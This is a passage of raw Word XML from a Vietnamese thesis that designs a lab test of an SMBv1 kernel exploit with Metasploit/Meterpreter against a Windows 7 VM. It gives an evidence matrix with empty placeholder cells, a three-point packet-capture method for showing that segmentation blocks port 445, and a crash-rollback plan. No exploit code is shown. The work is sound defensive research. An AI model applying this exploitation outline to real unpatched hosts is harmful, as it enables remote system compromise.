              <w:t xml:space="preserve">         |---&gt; (3) Kỹ thuật 3 &amp; 4: Kiểm chứng V (Mã lỗi NT Status 0xC0000205?)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |     [Thất bại: V=0 -&gt; Hệ thống đã vá] -&gt; Thành công (Cấp độ 3)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">         |---&gt; (4) Kỹ thuật 5: Kiểm chứng E &amp; C (Khai thác có kiểm soát)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">               |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">               +---&gt; Phiên Meterpreter thành công? ===&gt; PASS CẤP ĐỘ 4 (RCE SYSTEM)</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+---&gt; BSOD / Crash / Reboot / Timeout? =&gt; FAIL CẤP ĐỘ 4 (E=0 / Crash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F18FBEE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="0C85CBA8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 2.2: Sơ đồ tuần tự các pha kiểm thử theo mô hình chuỗi nhân quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E2989E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.5. MA TRẬN BẰNG CHỨNG ĐA NGUỒN VÀ QUY TRÌNH VẬN HÀNH AN TOÀN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27059BCC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.5.1. Thiết kế Ma trận bằng chứng thu thập đa nguồn (Evidence Matrix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D36B601" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nhằm đảm bảo tính minh bạch và khả năng truy vết chặt chẽ của thực nghiệm, mọi dữ liệu kiểm thử tại Chương 3 sẽ được đối chiếu và điền vào Ma trận bằng chứng thiết kế trước tại Bảng 2.4. Trong phạm vi thiết kế phương pháp luận của Chương 2, toàn bộ các ô dữ liệu đo lường thực nghiệm chưa chạy đều được gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[CẦN DỮ LIỆU]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> theo đúng quy định của đề tài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1167C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.4: Ma trận bằng chứng thực nghiệm đối chiếu đa nguồn (Evidence Matrix)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="956"/>
        <w:gridCol w:w="967"/>
        <w:gridCol w:w="810"/>
        <w:gridCol w:w="882"/>
        <w:gridCol w:w="800"/>
        <w:gridCol w:w="779"/>
        <w:gridCol w:w="1071"/>
        <w:gridCol w:w="1081"/>
        <w:gridCol w:w="945"/>
        <w:gridCol w:w="709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="6F6B20C8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="79F86FE1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Snapshot State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="4AE90CF7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Windows Build &amp; Hotfix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="69A32DE1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cấu hình SMBv1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="3423FBE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Trạng thái Routing / Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="63830390" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Nmap Raw Output &amp; Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="342C8BD2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mã phản hồi NSE (NT Status)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="2BFCCF55" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Metasploit Console Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="1CAAB3C4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bằng chứng Wireshark PCAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="5BBF2F68" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Firewall Drop Log Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="508A9461" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Kết luận Cấp độ 1–4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="66B58556" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7BD586CC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_0$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="49A140E9"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4A440DC6"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2FD14AAF"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0B2AE8AE"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082D0B2B"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43122DB0"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2B6F9434"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72954B81"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647E920A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[CẦN DỮ LIỆU]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4F33323E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9302C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_1$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2D49F275"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08E7509E"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2D0C7645"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522209BC"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7EDC54E0"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65B0FE93"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52232824"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29C7C5A5"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6FF6193D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[CẦN DỮ LIỆU]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="17E1C36C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7A1B62BD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_2$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="07A7F449"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51533F4E"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01B06251"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66B85BC5"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49A58410"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6DC82F14"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33C3073B"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5BF92ABD"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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00E9795E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[CẦN DỮ LIỆU]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="71624A39" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4B12C985" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_3$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2AC9DD01"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1D303DE4"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5EC31517"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7D0CF535"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7527FAFF"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19D4F583"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19DB5339"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0E1460C4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[CẦN DỮ LIỆU]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3ED0F560" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[CẦN DỮ LIỆU]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62C6718E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="71FF305F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.5.2. Quy trình kiểm chứng lưu lượng đa điểm (Multi-Point PCAP Verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF99E8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Để chứng minh một biện pháp phòng thủ (đặc biệt là phân đoạn mạng tại trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>) thực sự bẻ gãy tiền điều kiện tiếp cận mạng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R = \text{False}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), người kiểm thử không thể chỉ dựa vào thông báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Host seems down</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của Nmap. Thay vào đó, quy trình kiểm chứng lưu lượng mạng đa điểm được thiết lập tại ba vị trí quan sát đồng thời:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F03A9D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Điểm quan sát 1 (Tại trạm Pentest - VLAN 20):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bắt gói tin trên card </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ghi nhận lệnh Nmap có phát sinh các gói tin TCP SYN gửi tới địa chỉ đích </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cổng 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22057101" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Điểm quan sát 2 (Tại thiết bị Tường lửa/UTM):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kiểm tra bảng nhật ký lưu lượng (Firewall Filter Logs). Ghi nhận bản ghi tường lửa kích hoạt quy tắc chặn (Rule Drop/Reject) đối với gói tin TCP từ IP nguồn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tới IP đích </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.20:445</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CCF048" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Điểm quan sát 3 (Tại máy mục tiêu - VLAN 10):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bắt gói tin trên card mạng của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Target-Win7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Kết quả kiểm chứng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hoàn toàn vắng mặt bất kỳ gói tin TCP SYN nào</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> xuất phát từ địa chỉ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.20.10</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622AC77B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sự kết hợp đồng thời của ba bằng chứng: (a) Gói tin được gửi đi từ nguồn; (b) Tường lửa ghi nhận hành vi chặn; (c) Gói tin không đến được đích, là bằng chứng khoa học khẳng định tiền điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đã bị bẻ gãy có kiểm chứng trên thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33A4E9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>2.5.3. Kế hoạch ứng phó sự cố màn hình xanh (BSOD) và quy trình Rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A2F59" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do hiện tượng phân mảnh pool trong quá trình khai thác kernel luôn tiềm ẩn nguy cơ làm sập hệ điều hành, quy trình quản lý trạng thái và ứng phó sự cố được chuẩn hóa theo Sơ đồ 2.3:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="150A7C43" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3F0745B8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>+-------------------------------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|               BƯỚC 1: KHỞI TẠO VÀ LƯU SNAPSHOT              |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|        Tạo "Clean Baseline" khi máy ảo ở trạng thái sạch    |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
